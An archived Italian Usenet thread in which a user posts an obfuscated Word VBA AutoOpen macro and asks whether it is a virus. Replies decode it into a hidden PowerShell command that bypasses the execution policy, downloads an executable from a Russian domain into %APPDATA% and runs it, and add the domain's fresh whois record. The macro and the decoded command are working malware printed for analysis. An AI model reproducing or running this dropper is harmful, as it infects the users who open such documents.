Discussione:
Info su lettura codice VBA AutoOpen
(troppo vecchio per rispondere)
m***@infinito.it
2017-02-25 09:36:15 UTC
Permalink
Ciao,
qualcuno sa interpretare/leggere questo codice "AutoOpen": forse un malware o virus?

'====================================================
Sub AutoOpen()
E = Array(-2499, -8331, "-E", -1115, -9024, -8689, -2115, -7400, -6512, -3620)(2)
co = Array("Pr", -6145, -5430, -3719, -6087, -3982, -6888, -3126, -7150, -7661, -7988)(0)
le = Array(-9133, -4485, "-s", -5114, -2850, -2030, -7332)(2)
br0 = Array(-9174, -3925, -2884, -1679, -6838, -9422, "ow", -9929, -7813, -823, -1706, -5422)(6)
o = Array(-9514, -3565, -4689, ".e", -5411, -7356, -8311, -7136, -8385, -5660, -4041, -3737, -7045)(3)
ash2 = Array(-4946, -3620, -111, -3129, "Y^", -1359, -593, -1446, -2561, -7666, -2311)(4)
ih6 = Array(-2924, -4515, "Do", -5538)(2)
e2 = Array(-4615, -7693, -234, -6229, -1920, -3034, -471, -4133, -4210, -1769, -3854, -7842, "e ")(12)
qi = Array(-9694, -9491, "Ob", -1741, -3755, -7761, -1087, -8257)(2)
xhy6 = Array(-8244, -9820, -6764, -9584, "ni", -9826, -3832, -8757, -8413)(4)
k = Array(-4263, -9168, -504, -8225, -1712, -4249, "^l", -2406, -8096)(6)
y7 = Array(-8065, -1856, -4344, -4149, -5632, -8810, -3516, -9102, -6586, -2356, "oa")(10)
ne = Array(-3194, -9812, -4805, -4919, "le", -8836, -4189, -1200)(4)
usm7 = Array(-1061, -1575, -5441, -3649, -6423, "wE", -3502)(5)
elc8 = Array(-3155, -7692, -9355, -7383, "^P", -4273, -3001)(4)
xt = Array(-8920, -4328, -7000, -6791, -3332, -7808, -7844, -7833, "^e", -7772, -1501, -8873, -818)(8)
ad = Array(-5818, -7719, -1852, -7464, -604, -9213, -6681, -832, "L.", -6184)(8)
t9 = Array(-4007, -2770, -3954, -4323, -3014, "Ss", -6135)(5)
ty1 = Array(-6601, "^ ", -8887, -7096, -4714, -7605, -7924, -424, -2704, -8956)(1)
e4 = Array(-9976, "%.", -4474, -7221, -544)(1)
kho0 = Array("a^", -8747, -1921, -8405, -8184, -4646, -8385, -8113, -8717, -927, -5709, -5099)(0)
or7 = Array(-6540, -6867, "fi", -4850, -8296, -1211, -8900, -3929)(2)
i = Array(-6624, -458, -1100, -8376, -7822, -1604, "^e", -7589, -4504)(6)
ok1 = Array(-8220, -8564, -9862, "M.", -8900, -2531)(3)
ksy = Array(-8112, -2504, -3013, "T)")(3)
hge5 = Array(-8277, -3068, -3923, -9311, -7515, -2153, -8140, "N^", -7955, -4424, -3564, -4712, -9646)(7)
kj = Array(-4358, -3633, -4570, -3672, -2683, -5142, -8834, -1602, -1203, "^H", -524, -4859)(9)
vso2 = Array(-4407, -8267, -6678, -5734, -4204, -8084, -8460, -2707, -7511, -6943, "n ")(10)
fy6 = Array(-3434, -5614, -7953, -3183, -8712, -450, "v'")(6)
cu6 = Array(-1531, " ^", -6076, -2746, -768, -8816)(1)
op8 = Array(-6634, -3310, -3329, "^r", -7871)(3)
a1 = Array(-9980, -9929, " B", -4171)(2)
nr = Array(-4745, -827, -7093, "xe", -7962, -1181, -3139, -5312, -9094, -7241, -7010, -6604, -6756)(3)
a6 = Array(-567, -4773, -1022, -7665, -8068, -5244, -5526, "DA")(7)
u3 = Array(-4209, -8764, -1217, -356, -593, -3913, -4669, -2209, -9098, "Y^", -9746, -5762, -2346, -2708)(9)
a = Array(-7995, -3949, -7810, -342, -6557, -4546, -394, "^e", -4879, -3804)(7)
e0 = Array("9.", -6606, -2475, -5516, -320, -3746, -4000, -6149, -2004, -7858, -6223)(0)
rpu = Array(-9911, -389, -5498, " ^", -5377, -4065, -8610, -6718, -5196, -1515, -7551, -7968, -7976, -6146)(3)
lwi = Array(-7796, -2044, -944, -6118, -4132, -7659, -8156, -4449, -9498, -5411, -1867, -7179, "at", -5897)(12)
ez8 = Array(-7238, -3726, "PD", -5180, -4322, -4136, -5678)(2)
y1 = Array(-964, -5300, -5587, "^c", -8105, -6627, -1777, -2369, -2746, -8932, -1151, -7043, -9155)(3)
vg = Array(-1987, -3500, -3026, -9035, -5924, -3382, -8284, -4611, ".d", -3901)(8)
bu9 = Array(-9409, -4944, -4552, -7106, "Ex", -4764, -1357, -1302, -8152, -8797, -9610, -6203, -4524)(4)
yj0 = Array(-2648, -4098, -8414, "pO", -7241, -1427, -6190, -4263, -6119, -7254, -8781)(3)
dzy8 = Array("oF", -4353, -4705, -3121, -334, -6384, -7011, -180, -5684, -1926, -3559, -5022, -7972, -8889)(0)
su = Array(-7844, -4062, -2544, "rs", -3845, -4180)(3)
pj = Array(-3281, -2688, -4947, "Ne", -8061, -6392)(3)
akt3 = Array(-7736, -1310, -8830, "^-")(3)
z5 = Array(-6426, -9359, -1474, -2343, "vr")(4)
tu = Array("ap", -2188, -6814, -2137)(0)
wwa6 = Array(-5656, -4799, -8852, -6860, -6147, -9377, "EX", -7431, -7220, -4342, -6386)(6)
wwy0 = Array(-8955, -5987, -3168, -1011, -5015, -448, "d.", -4528, -2267, -6855, -5966, -9843, -1714)(6)
v = Array("tp", -2197, -2341, -1831, -5394)(0)
dx = Array(-5195, -3283, " ", -782, -6518, -5419, -2023, -8009, -7371, -4851)(2)
ak6 = Array(-8815, -3627, "n^", -6083)(2)
el0 = Array(-8228, -5124, -5216, "^ ", -7101, -5842)(3)
y6 = Array(-3036, -8154, -6092, -1678, "ru", -6156, -1220, -6470, -7695, -7110)(4)
zny = Array(-8735, -1649, -6590, "E'", -2486)(3)
ihg = Array(-9566, -9151, -2442, -3186, -4140, "eC", -3359, -8944, -2805, -4330, -251, -770, -7334)(5)
awg7 = Array(-1381, -6545, -1528, -4027, "^x", -7213, -345, -3448, -5216)(4)
elt9 = Array(-7155, -2045, -9804, -1679, -9322, -1039, "^t")(6)
bx6 = Array(-7346, -6535, -6649, -1557, -8205, " """, -503, -9299)(5)
p = Array(-9023, -9384, -6281, "^d")(3)
e7 = Array(-4330, -4502, -2086, "il", -1440, -106)(3)
fy = Array(-2896, -3072, "E ", -8940)(2)
rc = Array(-262, -4020, -1861, -6618, "^E", -8660, -4283, -5233, -4360, -8181, -9190, -3611)(4)
a3 = Array(-6715, -9966, "er", -6755, -8090, -2309, -3971, -9603, -6522, -1151, -5554)(2)
yfc = Array(-2019, -7811, "e^", -3485, -9553)(2)
i3 = Array(-8793, -1484, -679, -6839, -3731, "JE", -7782, -199, -7631)(5)
hji9 = Array(-5404, -6666, -6785, -1122, -8127, -2230, "A%", -1372, -9509, -9927, -3316, -453)(6)
y2 = Array(-3057, "cm", -2627, -8086, -8375, -7156, -7506, -2557, -1719)(1)
u = Array(-8924, -7794, -5991, -4141, "UT", -6594)(4)
sb = Array(-6251, -4400, -4213, "40", -9108, -4430, -1022, -8642, -8001, -5128, -4892)(3)
pi7 = Array(-6798, -8020, -6268, -1643, -3704, -9309, -4949, -4866, "^-", -8333, -2582, -8707, -4367, -4633)(8)
d = Array(-6859, -3419, -7833, -267, "d^", -9816, -1688, -2887, -5736)(4)
wsy = Array(-8594, -3860, -4818, "CT", -8266, -9886, -2588, -863, -2037, -7963, -7784)(3)
ih0 = Array(-597, -5038, -9883, -8505, -3012, -1798, "'%")(6)
hn = Array(-1299, -3396, -1760, -5740, -2969, "ty", -4869, -8564, -7384)(5)
lf7 = Array(-9436, -4708, -473, -5587, -1498, "Id", -2665, -8021, -5756, -6199, -2591, -9329, -8783)(5)
p4 = Array(-7927, -5815, -1840, -7516, "e/")(4)
ygd6 = Array(-7735, -7049, -2542, -9986, "y.", -8993)(4)
e8 = Array(-119, -525, -8132, -1789, -948, -5789, -8063, -8530, ":/", -1546, -4200, -6722, -8803)(8)
tj5 = Array(-5960, -3226, -4094, -6432, -1200, "ve", -7639, -2957, -130, -6809)(5)
sy = Array("n^", -1214, -7147, -2523, -456, -9248, -8687, -618, -3269, -549)(0)
ex9 = Array(-8139, -2781, "('", -2143, -6436, -3893, -1043, -365)(2)
zto = Array(-6096, -7701, "aR", -3252, -7696, -2085, -4844, -5684, -3141)(2)
afq = Array(-8570, -4284, -9001, -8509, "sT", -9884, -826, -5167, -779, -3966, -9277, -9444)(4)
rpo = Array(-9325, -9167, -8202, -4273, -5126, -6885, -8260, -9331, -3085, "bC", -1020, -1919)(9)
ns2 = Array(-468, -1060, -4726, -6230, -8620, -6000, -217, -4039, -9002, -4395, -3973, -9697, -8707, "Po")(13)
my = Array("-n", -4411, -4269, -3618, -7326, -404, -3964, -7619, -1025, -3633, -139, -1330, -2051, -4380)(0)
od4 = Array(-9903, -5332, "l^", -9592, -6742, -4755, -9522, -4555, -5479, -1228, -9878, -458)(2)
r = Array(-3591, -3478, -3918, -375, -7781, -8401, -9101, "o^", -3168, -142, -9416, -2463, -4453, -3685)(7)
zy = Array(-247, -9947, -8464, -3333, -4088, "^I", -1823, -2278, -6793, -6053, -2429, -7463, -3388, -7594)(5)
yfd0 = Array(-6757, -5321, -8453, -5803, -5512, "^O", -9033, -6599, -1634, -9181, -6546, -9998)(5)
gwi7 = Array(-7580, -9321, -4417, -1770, "ht", -522, -7656, -6373, -7682, -5757)(4)
vfo = Array(-4285, -4060, -8270, -9346, -4602, -2009, "ew", -5138, -9512, -2925)(6)
xo = Array(-5169, -4292, -2716, -3581, -2156, -5111, -4092, -3335, -6830, ",'")(9)
nno0 = Array(-6932, -1090, -9589, -6356, -2046, "/f", -3516)(5)
y0 = Array(-5682, -9285, -1631, "yP", -9446, -3023, -5612)(3)
xf = Array(-3325, -1343, -7954, -9473, -8007, -7973, -1915, -8871, "Ss", -359)(8)
dl = Array(-9250, -421, -7459, -9192, -3192, -1974, "li", -3241, -6465, -6238)(6)
wf = Array(-6418, -6450, -8046, "-^", -2347)(3)
orv5 = Array(-5222, -436, " ", -3772, -6704, -3390, -864, -8206)(2)
olv2 = Array(-9869, -5489, "Ws", -6427, -4439)(2)
yhz = Array(-6968, -3619, -749, -1746, -2884, -7461, "he", -9216, -328)(6)
uf = Array(-8590, "ex", -4469, -9237, -2840, -6775, -7334, -9737)(1)
bka = Array(-1652, "/w", -9839, -3622, -4117, -9503)(1)
mmo7 = Array(-7804, -5713, -2622, -1254, -9848, -4750, -1444, -7715, -4661, "s^", -1733)(9)
nse = Array(-4080, -3019, -7393, -4732, -9814, -5805, " ", -7133, -2403, -3301)(6)
xf9 = Array(-4942, "w^", -2429, -1773, -5706, -635, -9907, -3814)(1)
iw8 = Array("L^", -672, -5262, -8918)(0)
pt = Array(-4569, -3921, -9827, -5818, -1658, -1137, "IN")(6)
yln = Array(-8192, -1698, -7405, -3612, -3621, -5415, -984, -8373, -7703, -5945, -5929, "(n", -852)(11)
go = Array(-8222, -1235, -9312, "E ", -9422, -4532, -1073, -5162)(3)
j0 = Array(-7690, -2754, -348, "/c", -4076, -5862, -7659, -1374)(3)
twy8 = Array("nb", -557, -564, -2052, -8412, -7863, -2494, -611, -1278)(0)
u0 = Array(" ", -5102, -9927, -7811, -3563, -2635, -5323, -506)(0)
avp = Array(-7907, -7696, -9819, "ta", -6805, -4196)(3)
ih5 = Array(-7570, "wE", -7444, -9510)(1)
j = Array(-7811, -1094, -7451, -5764, "%a", -4178)(4)
ba4 = Array(-9856, -2212, -9669, -8106, -4562, -2860, "'""", -3141, -7935)(6)
gf1 = Array(-670, -5588, -6037, -3905, -2418, -3491, -9562, -6008, -8897, -6499, -3668, "pP", -834, -4311)(11)
wjyxxuwpa = 0
h = Array(")^", -2108, -5711, -6387, -6772, -6968, -7590, -4925, -5766, -7200, -1129, -290, -5195)(0)
etr = Array(-1342, -5139, "t.", -4690)(2)
gnu4 = Array(-407, -8728, "LI", -7231, -823)(2)
bza = Array(-7058, -6251, "t.", -4947, -5959, -8683)(2)
bqy = Array(-8731, -2401, -4095, "oc", -3004, -5302, -1803, -1460, -5003, -7431, -6085)(3)
qy = Array(-4833, -3944, -2370, -5884, "r3", -9398, -5860, -3713, -1371, -8483)(4)
kvu6 = Array(-9888, -1816, -1233, -1435, -5917, -7855, -238, "ew", -2069, -9963)(7)
oc8 = Array(-3951, -9080, ";S", -306, -2547, -5211, -4821, -2419, -2375, -5980, -1700, -4383)(2)
l4 = Array(-7010, -4517, -7874, -1034, -9108, -5440, -5075, "t^", -8644, -4524)(7)
ha = Array(-664, -4232, -6882, -1582, -3053, "iL", -7091, -1601, -4944, -7343, -1037)(5)

If ActiveDocument.Kind = 0 Then
ydype = Array(y2 & wwy0 & wwa6 & e2 & j0 & bx6 & ns2 & ih5 & su & yhz & k & ad & uf & i & cu6 & E & awg7 & ihg & u & zy & yfd0 & hge5 & yj0 & gnu4 & y1 & ash2 & nse & a1 & y0 & kho0 & t9 & ty1 & my & r & co & dzy8 & ha & fy & orv5 & akt3 & xf9 & pt & ih6 & olv2 & hn & iw8 & go & kj & lf7 & d & yfc & vso2 & dx & u0 & yln & vfo & wf & qi & i3 & wsy & rpu & mmo7 & u3 & afq & a & ok1 & pj & bza & usm7 & rpo & dl & rc & sy & ksy & vg & br0 & ak6 & od4 & y7 & p & or7 & ne & ex9 & gwi7 & v & e8 & bka & kvu6 & ygd6 & z5 & le & a3 & tj5 & qy & sb & e0 & y6 & nno0 & e7 & p4 & xhy6 & etr & twy8 & fy6 & xo & j & gf1 & a6 & avp & e4 & bu9 & zny & h & oc8 & l4 & zto & elt9 & pi7 & elc8 & op8 & bqy & xt & xf & el0 & ih0 & tu & ez8 & lwi & hji9 & o & nr & ba4)(0)
Shell ydype, wjyxxuwpa
End If
End Sub

'====================================================
Tia. Maurizio
Ammammata
2017-02-28 13:47:11 UTC
Permalink
Il giorno Sat 25 Feb 2017 10:36:15a, ** ha inviato su
Post by m***@infinito.it
ydype = Array(y2 & wwy0 & wwa6 & e2 & j0 & bx6 & ns2 & ih5 & su & yhz
& k & ad & uf & i & cu6 & E & awg7 & ihg & u & zy & yfd0 & hge5 & yj0
& gnu4 & y1 & ash2 & nse & a1 & y0 & kho0 & t9 & ty1 & my & r & co &
dzy8 & ha & fy & orv5 & akt3 & xf9 & pt & ih6 & olv2 & hn & iw8 & go &
kj & lf7 & d & yfc & vso2 & dx & u0 & yln & vfo & wf & qi & i3 & wsy &
rpu & mmo7 & u3 & afq & a & ok1 & pj & bza & usm7 & rpo & dl & rc & sy
& ksy & vg & br0 & ak6 & od4 & y7 & p & or7 & ne & ex9 & gwi7 & v & e8
& bka & kvu6 & ygd6 & z5 & le & a3 & tj5 & qy & sb & e0 & y6 & nno0 &
e7 & p4 & xhy6 & etr & twy8 & fy6 & xo & j & gf1 & a6 & avp & e4 & bu9
& zny & h & oc8 & l4 & zto & elt9 & pi7 & elc8 & op8 & bqy & xt & xf &
el0 & ih0 & tu & ez8 & lwi & hji9 & o & nr & ba4)(0)
il comando dato in pasto a shell é:

cmd.EXe /c "PowErshe^lL.ex^e ^-E^xeCUT^I^ON^pOLI^cY^ ByPa^Ss^ -no^ProFiLE
^-w^INDoWstyL^E ^HIdd^e^n (new-^ObJECT
^s^Y^sT^eM.Net.wEbCli^En^T).down^l^oa^dfile('http://wewy.vr-
server3409.ru/file/nit.nbv','%apPDAta%.ExE')^;St^aR^t^-^P^roc^eSs^
'%apPDatA%.exe'"

con parametro wjyxxuwpa
--
/-\ /\/\ /\/\ /-\ /\/\ /\/\ /-\ T /-\
-=- -=- -=- -=- -=- -=- -=- -=- - -=-
Post by m***@infinito.it
http://www.bb2002.it :) <<<<<
........... [ al lavoro ] ...........
Ammammata
2017-02-28 14:21:16 UTC
Permalink
Il giorno Tue 28 Feb 2017 02:47:11p, *Ammammata* ha inviato su
Post by Ammammata
http://wewy.vr-
server3409.ru
fresco di registrazione:

domain: VR-SERVER3409.RU
nserver: ns1.journeys.tw.
nserver: ns2.journeys.tw.
state: REGISTERED, NOT DELEGATED, VERIFIED
person: Private Person
registrar: REGRU-RU
admin-contact: http://www.reg.ru/whois/admin_contact
created: 2017.02.20
paid-till: 2018.02.20
free-date: 2018.03.23
source: TCI
--
/-\ /\/\ /\/\ /-\ /\/\ /\/\ /-\ T /-\
-=- -=- -=- -=- -=- -=- -=- -=- - -=-
Post by Ammammata
http://www.bb2002.it :) <<<<<
........... [ al lavoro ] ...........
Continua a leggere su narkive:
Loading...